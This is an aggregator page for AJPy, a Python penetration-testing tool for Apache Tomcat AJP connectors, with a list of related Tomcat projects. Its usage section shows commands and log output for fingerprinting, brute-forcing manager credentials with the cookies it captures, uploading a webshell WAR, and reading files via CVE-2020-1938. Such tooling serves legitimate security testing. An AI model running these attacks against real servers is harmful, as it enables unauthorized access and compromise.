hypn0s / Ajpy
Licence: bsd-3-clause
Stars: ✭ 305
Programming Languages
python
139335 projects - #7 most used programming language
Labels
Projects that are alternatives of or similar to Ajpy
smeagol-galore
A git-based wiki featuring markdown, a WYSIWYG Editor, PlantUML, and much more
Stars: ✭ 21 (-93.11%)
Mutual labels: tomcat
Bolo Solo
🍍 Bolo 菠萝博客 专为程序员设计的精致 Java 博客系统 | 🎸基于Solo深度定制 | 免登录评论 | 动态邮件/Server酱微信提醒 | 自定义图床 | 一键隐藏交互式模块,备案必备 | ✨精致主题持续更新 | 备份一键导出导入 | 内置防火墙 | 评论过滤 | 独立分类 | 文章同步/备份到链滴 | 离线博客 | ✅安装太轻松!WAR包、Tomcat、Docker、JAR部署支持 | 🚚支持从Solo轻松迁移
Stars: ✭ 257 (-15.74%)
Mutual labels: tomcat
Java-CS-Record
记录准备春招实习过程中,学习与复习的知识(模块化整理,非面试题速成)。注:暂停更新,后续请移步博客
Stars: ✭ 73 (-76.07%)
Mutual labels: tomcat
docker-tomcat-mysql
Docker image for tomcat+mysql, orchestrated with supervisord
Stars: ✭ 26 (-91.48%)
Mutual labels: tomcat
DIMS
🐟 数据库系统原理课程设计,Drug Inventory Management System,基于 SSM 框架的医院药品库存管理系统。
Stars: ✭ 49 (-83.93%)
Mutual labels: tomcat
devops-ninja
This is a collection of some very useful command-line commands that eases the life of a DevOps Engineer.
Stars: ✭ 27 (-91.15%)
Mutual labels: tomcat
Tomcatwardeployer
Apache Tomcat auto WAR deployment & pwning penetration testing tool.
Stars: ✭ 287 (-5.9%)
Mutual labels: tomcat
ubuntu-nginx-lucee
Script for standing up a Lucee server using nginx and Tomcat on Ubuntu
Stars: ✭ 82 (-73.11%)
Mutual labels: tomcat
tomcter
😹 Tomcter is a python tool developed to bruteforce Apache Tomcat manager login with Apache Tomcat default credentials.
Stars: ✭ 18 (-94.1%)
Mutual labels: tomcat
docker-geoserver
A basic docker geoserver image with JAI and marlin renderer running on tomcat
Stars: ✭ 17 (-94.43%)
Mutual labels: tomcat
docker-examples
Configuration files for typical service running in Docker.
Stars: ✭ 18 (-94.1%)
Mutual labels: tomcat
godofwar
GodOfWar - Malicious Java WAR builder with built-in payloads
Stars: ✭ 118 (-61.31%)
Mutual labels: tomcat
Docker Draw.io
Dockerized draw.io based on tomcat:9-jre11 & tomcat:9-jre8-alpine official image.
Stars: ✭ 279 (-8.52%)
Mutual labels: tomcat
ketabhome-shopping-cart-admin-panel
🛒 📙 📔 ketabhome is an online java book store application with admin panel based on servlet, with database c3p0 connector
Stars: ✭ 19 (-93.77%)
Mutual labels: tomcat
installtomcataws
Install tomcat 8.x in AWS (Amazon Linux AMI)
Stars: ✭ 13 (-95.74%)
Mutual labels: tomcat
Joinfaces
JoinFaces: JSF Spring Boot Starters - JSF inside Spring Boot Application
Stars: ✭ 295 (-3.28%)
Mutual labels: tomcat
Redisson
Redisson - Redis Java client with features of In-Memory Data Grid. Over 50 Redis based Java objects and services: Set, Multimap, SortedSet, Map, List, Queue, Deque, Semaphore, Lock, AtomicLong, Map Reduce, Publish / Subscribe, Bloom filter, Spring Cache, Tomcat, Scheduler, JCache API, Hibernate, MyBatis, RPC, local cache ...
Stars: ✭ 17,972 (+5792.46%)
Mutual labels: tomcat
ansible-role-tomcat
Install and configure tomcat on your system.
Stars: ✭ 34 (-88.85%)
Mutual labels: tomcat
Intro
AJPy aims to craft AJP requests in order to communicate with AJP connectors.
Reference documentation: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
Tools
At the moment, only one tool is provided for Tomcat with the following modules:
- version fingerprint
$ python tomcat.py version 172.17.0.2
Apache Tomcat/8.0.35
- authentication bruteforce
$ python tomcat.py -v bf -U tomcat_mgr_default_users.txt -P tomcat_mgr_default_pass.txt /manager/html 172.17.0.2
[2016-06-10 17:24:55.965] INFO Attacking a tomcat at ajp13://172.17.0.2:8009/manager/html
[2016-06-10 17:24:56.017] DEBUG testing admin:admin
[2016-06-10 17:24:56.069] INFO Found valid credz: admin:admin
[2016-06-10 17:24:56.069] INFO Here is your cookie: JSESSIONID=1267BE97BFB5BFAEAFAAD76EE648FE06; Path=/manager/; HttpOnly
[2016-06-10 17:24:56.069] DEBUG testing admin:manager
[2016-06-10 17:24:56.152] DEBUG testing admin:role1
[2016-06-10 17:24:56.154] DEBUG testing admin:root
[2016-06-10 17:24:56.155] DEBUG testing admin:tomcat
[2016-06-10 17:24:56.157] DEBUG testing manager:admin
[2016-06-10 17:24:56.158] DEBUG testing manager:manager
[2016-06-10 17:24:56.159] DEBUG testing manager:role1
[2016-06-10 17:24:56.160] DEBUG testing manager:root
[2016-06-10 17:24:56.161] DEBUG testing manager:tomcat
[2016-06-10 17:24:56.164] DEBUG testing role1:admin
[2016-06-10 17:24:56.164] DEBUG testing role1:manager
[2016-06-10 17:24:56.165] DEBUG testing role1:role1
[2016-06-10 17:24:56.166] DEBUG testing role1:root
[2016-06-10 17:24:56.167] DEBUG testing role1:tomcat
[2016-06-10 17:24:56.169] DEBUG testing root:admin
[2016-06-10 17:24:56.170] DEBUG testing root:manager
[2016-06-10 17:24:56.171] DEBUG testing root:role1
[2016-06-10 17:24:56.172] DEBUG testing root:root
[2016-06-10 17:24:56.173] DEBUG testing root:tomcat
[2016-06-10 17:24:56.175] DEBUG testing tomcat:admin
[2016-06-10 17:24:56.175] DEBUG testing tomcat:manager
[2016-06-10 17:24:56.176] DEBUG testing tomcat:role1
[2016-06-10 17:24:56.177] DEBUG testing tomcat:root
[2016-06-10 17:24:56.178] DEBUG testing tomcat:tomcat
[2016-06-10 17:24:56.184] INFO Found valid credz: tomcat:tomcat
[2016-06-10 17:24:56.184] INFO Here is your cookie: JSESSIONID=9944126F31E428B8847AFEBF2307BB09; Path=/manager/; HttpOnly
[2016-06-10 17:24:56.184] DEBUG testing tomcat:sstic2016
[2016-06-10 17:24:56.186] DEBUG testing both:admin
[2016-06-10 17:24:56.187] DEBUG testing both:manager
[2016-06-10 17:24:56.188] DEBUG testing both:role1
[2016-06-10 17:24:56.189] DEBUG testing both:root
[2016-06-10 17:24:56.190] DEBUG testing both:tomcat
[2016-06-10 17:24:56.191] DEBUG Closing socket...
- WAR upload
$ python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2
- WAR undeploy
$ python tomcat.py undeploy -u tomcat -p tomcat /webshell 172.17.0.2
- Application listing
$ python tomcat.py list -u tomcat -p tomcat 172.17.0.2
- Reading file using CVE-2020-1938
$ python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 172.17.0.2
Thanks
- @MrTchuss for the Tomcat WAR upload fix
- @kalidor for the Tomcat WAR undeploy and application listing
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].